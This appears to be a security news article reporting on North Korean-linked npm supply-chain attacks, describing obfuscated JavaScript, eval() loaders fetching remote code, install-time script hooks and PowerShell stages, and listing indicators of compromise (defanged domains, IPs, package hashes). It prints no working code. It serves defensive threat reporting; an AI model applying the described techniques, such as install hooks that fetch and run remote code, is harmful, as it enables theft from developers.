Hackers often target NPM packages to inject malicious code into widely used libraries, enabling them to reach a massive developer and application base.
Through such exploitation, threat actors can steal sensitive information, such as source code and configuration files, to deploy malware.
Phylum researchers recently discovered that North Korean hackers are actively attacking the developers via malicious NPM packages.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial
Technical Analysis
North Korean-aligned threat actors have renewed their malicious campaign on npm, publishing multiple packages since August 12, 2024, including:-
- temp-etherscan-api
- ethersscan-api
- telegram-con
- qq-console
This campaign, linked to the C2 “Contagious Interview,” utilizes multi-layered masked JavaScript with which additional malware features can be retrieved from the internet.
Among other things, it uses Python scripts and even a fully working version of the Python interpreter to secretly install browser extensions for cryptocurrency wallets, continuously search, and steal their delicate content.
In a separate package, helmet-validate, there is another method of code inclusion as it is embedded in config.js and makes use of the eval() construct to load external JavaScript.
Such attacks reveal the evolution of Tactics, Techniques, and Procedures (TTPs) methods, that are greatly threatening to the developer community.
Advanced Persistent Threat groups linked to North Korea, such as ‘Moonstone Sleet’, are also known to be proceeding with advanced supply chain attacks on the npm ecosystem.
Their methods include using typosquatted packages such as sass-notification with heavily obfuscated JavaScript payloads in them.
The malicious scripts include the use of eval() that fetches malicious code from some abused sites like ipcheck[.]cloud and mirotalk[.]net (both resolving to 167[.]88[.]36[.]13).
Besides this, the attack chain typically involves multi-stage execution, starting with batch scripts that spawn PowerShell processes.
XOR decrypts the payloads downloaded using the PowerShell processes, proceeds to load the payloads as dlls through reflection, and applies anti-forensic techniques to eliminate the artifacts left behind.
The actors also use package.json script fields to maliciously invoke code on npm install or during the build process.
This campaign highlights the clear advancements in North Korean operations, as it exhibits advanced techniques of hiding information, avoiding detection, and continuing to operate to break through static analysis and endpoint protection methods.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!
IoCs
ipcheck[.]cloud
45[.]61[.]158[.]14
167[.]88[.]36[.]13
95[.]164[.]17[.]24
| Package Name | Version | Package Tarball Sha256 |
|---|---|---|
| ethersscan-api | 0.0.1 | d4f3113e1e0384bcf37c39678deb196fb5b39f15c4990134b6b8637be74e5a2e |
| ethersscan-api | 0.0.2 | f1f3002dec6e36e692e087626edd9b6b0f95a176c0c204d4703ccb4f425aa317 |
| ethersscan-api | 0.0.3 | 5e5313aaf281c8a8eed29ba2c1aaa5aa65bc174bcd0be466f4533712599db758 |
| helmet-validate | 0.0.1 | 2a00838ccd08b26c7948d1dd25c33a114dd81c3bcee3de595783e6f396e7f50e |
| qq-console | 0.0.1 | aec21b53ee4ae0b55f5018fc5aaa5a4f095a239a64272ca42047c40ec3c212c0 |
| sass-notification | 1.0.0 | f7c142178605102ee56f7e486ba68b97f3f6b522994b24f4116dbbd2abc28cec |
| telegram-con | 0.0.1 | 0110318f70072171c0edc624c8e8be38892f984b121d6a5a5ced1f6b0b45dbd0 |
| temp-etherscan-api | 0.0.1 | 94da263d603bf735ab85f829b564261e59a1d13915d21babe58e72435bfe32ab |